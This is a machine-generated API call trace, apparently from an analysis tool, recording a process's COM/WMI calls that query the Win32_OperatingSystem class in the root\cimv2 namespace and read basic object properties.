	[0220.661] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd181d8) returned 0x0
	[0220.661] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x3
	[0220.661] IUnknown:Release (This=0x1cd181d8) returned 0x2
	[0220.661] IUnknown:Release (This=0x1cd181d8) returned 0x1
	[0220.661] WbemLocator:IUnknown:Release (This=0x1cd1b2b8) returned 0x2
	[0220.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0220.662] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0220.662] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.662] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0220.662] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0220.662] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x2
	[0220.662] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd181d8) returned 0x0
	[0220.662] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0220.662] IUnknown:AddRef (This=0x1cd181d8) returned 0x3
	[0220.662] IEnumWbemClassObject:Clone (in: This=0x1cd181d8, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd1c728) returned 0x0
	[0220.665] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd1c730) returned 0x0
	[0220.666] IClientSecurity:QueryBlanket (in: This=0x1cd1c730, pProxy=0x1cd1c728, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0220.666] IUnknown:Release (This=0x1cd1c730) returned 0x1
	[0220.666] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b83c480) returned 0x0
	[0220.666] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd1c730) returned 0x0
	[0220.666] IClientSecurity:SetBlanket (This=0x1cd1c730, pProxy=0x1cd1c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.670] IUnknown:Release (This=0x1cd1c730) returned 0x2
	[0220.670] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x1
	[0220.670] CoTaskMemFree (pv=0x1b839ce0) 
	[0220.670] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b83c480) returned 0x0
	[0220.670] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0220.671] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0220.676] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x3
	[0220.677] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0220.677] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b83c368) returned 0x0
	[0220.677] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c368, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.677] WbemLocator:IUnknown:Release (This=0x1b83c368) returned 0x3
	[0220.677] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0220.677] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x4
	[0220.677] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b83c450) returned 0x0
	[0220.677] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x4
	[0220.678] WbemLocator:IRpcOptions:Query (in: This=0x1b83c450, pPrx=0x1b83c480, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0220.678] WbemLocator:IUnknown:Release (This=0x1b83c450) returned 0x3
	[0220.678] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x2
	[0220.678] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0220.678] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0220.678] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x3
	[0220.679] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd1c728) returned 0x0
	[0220.679] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x3
	[0220.679] IUnknown:Release (This=0x1cd1c728) returned 0x2
	[0220.679] IUnknown:Release (This=0x1cd1c728) returned 0x1
	[0220.679] IUnknown:Release (This=0x1cd181d8) returned 0x2
	[0220.679] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0220.679] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0220.679] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x2
	[0220.680] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd1c728) returned 0x0
	[0220.680] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x2
	[0220.680] IUnknown:AddRef (This=0x1cd1c728) returned 0x3
	[0220.680] IEnumWbemClassObject:Reset (This=0x1cd1c728) returned 0x0
	[0220.682] IUnknown:Release (This=0x1cd1c728) returned 0x2
	[0220.682] CoTaskMemAlloc (cb=0x8) returned 0x1b858d50
	[0220.682] IEnumWbemClassObject:Next (in: This=0x1cd1c728, lTimeout=-1, uCount=0x1, apObjects=0x1b858d50, puReturned=0x1c6ece78 | out: apObjects=0x1b858d50*=0x1cd1e8d0, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0220.696] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd1e8d0) returned 0x0
	[0220.696] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0220.697] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0220.697] IUnknown:AddRef (This=0x1cd1e8d0) returned 0x3
	[0220.697] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0220.697] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd1e8d8) returned 0x0
	[0220.697] IMarshal:GetUnmarshalClass (in: This=0x1cd1e8d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0220.698] IUnknown:Release (This=0x1cd1e8d8) returned 0x3
	[0220.698] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0220.698] IUnknown:AddRef (This=0x1cd1e8d0) returned 0x4
	[0220.698] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0220.698] IUnknown:Release (This=0x1cd1e8d0) returned 0x3
	[0220.698] IUnknown:Release (This=0x1cd1e8d0) returned 0x2
	[0220.698] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0220.698] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0220.698] IUnknown:AddRef (This=0x1cd1e8d0) returned 0x3
	[0220.699] IUnknown:QueryInterface (in: This=0x1cd1e8d0, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd1e8d0) returned 0x0
	[0220.699] IUnknown:Release (This=0x1cd1e8d0) returned 0x3
	[0220.699] IUnknown:Release (This=0x1cd1e8d0) returned 0x2
	[0220.699] IUnknown:Release (This=0x1cd1e8d0) returned 0x1
	[0220.699] CoTaskMemFree (pv=0x1b858d50) 
	[0220.699] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0220.699] IUnknown:AddRef (This=0x1cd1e8d0) returned 0x2
	[0220.699] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0220.700] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0220.700] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0220.700] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0220.700] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0220.700] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0220.700] IUnknown:Release (This=0x321868) returned 0x1
	[0220.701] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd1e160) returned 0x0
	[0220.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1e160, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
	[0220.701] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd1e160, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd20820) returned 0x0
	[0220.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd20820) returned 0x0
	[0220.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0220.702] WbemDefPath:IUnknown:AddRef (This=0x1cd20820) returned 0x3
	[0220.702] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0220.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b853090) returned 0x0
	[0220.702] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b853090, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.703] WbemDefPath:IUnknown:Release (This=0x1b853090) returned 0x3
	[0220.703] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0220.703] WbemDefPath:IUnknown:AddRef (This=0x1cd20820) returned 0x4
	[0220.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0220.703] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x3
	[0220.703] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x2
	[0220.703] WbemDefPath:IUnknown:Release (This=0x1cd1e160) returned 0x0
	[0220.703] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x1
	[0220.704] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0220.704] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0220.704] WbemDefPath:IUnknown:AddRef (This=0x1cd20820) returned 0x2
	[0220.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd20820) returned 0x0
	[0220.704] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x2
	[0220.704] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x1
	[0220.704] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0220.704] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0220.704] WbemDefPath:IUnknown:AddRef (This=0x1cd20820) returned 0x2
	[0220.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd20820, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd20820) returned 0x0
	[0220.704] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x2
	[0220.705] WbemDefPath:IUnknown:AddRef (This=0x1cd20820) returned 0x3
	[0220.705] WbemDefPath:IWbemPath:SetText (This=0x1cd20820, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x0
	[0220.705] WbemDefPath:IUnknown:Release (This=0x1cd20820) returned 0x2
	[0220.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0220.705] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0220.705] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.705] CoTaskMemAlloc (cb=0x8) returned 0x1b858d50
	[0220.705] IEnumWbemClassObject:Next (in: This=0x1cd1c728, lTimeout=-1, uCount=0x1, apObjects=0x1b858d50, puReturned=0x1c6ece78 | out: apObjects=0x1b858d50*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0220.707] CoTaskMemFree (pv=0x1b858d50) 
	[0220.707] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0220.707] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x1
	[0220.707] IUnknown:Release (This=0x1cd1c728) returned 0x0
	[0221.011] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd80 | out: puCount=0x1c6ecd80*=0x2) returned 0x0
	[0221.011] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd80*=0x17, pszText=0x0) returned 0x0
	[0221.011] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.012] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd6c*=0, plFlavor=0x1c6ecd68*=0 | out: pVal=0x1c6ecd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecd6c*=8, plFlavor=0x1c6ecd68*=64) returned 0x0
	[0221.012] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0221.012] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd7c*=8, plFlavor=0x1c6ecd78*=64 | out: pVal=0x1c6ecd80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecd7c*=8, plFlavor=0x1c6ecd78*=64) returned 0x0
	[0221.012] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0221.012] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd80 | out: puCount=0x1c6ecd80*=0x2) returned 0x0
	[0221.012] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd80*=0x17, pszText=0x0) returned 0x0
	[0221.012] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.012] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c6ecd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd6c*=0, plFlavor=0x1c6ecd68*=0 | out: pVal=0x1c6ecd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c6ecd6c*=8, plFlavor=0x1c6ecd68*=64) returned 0x0
	[0221.012] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0221.012] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c6ecd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd7c*=8, plFlavor=0x1c6ecd78*=64 | out: pVal=0x1c6ecd80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c6ecd7c*=8, plFlavor=0x1c6ecd78*=64) returned 0x0
	[0221.012] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0221.013] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0221.013] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0221.013] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
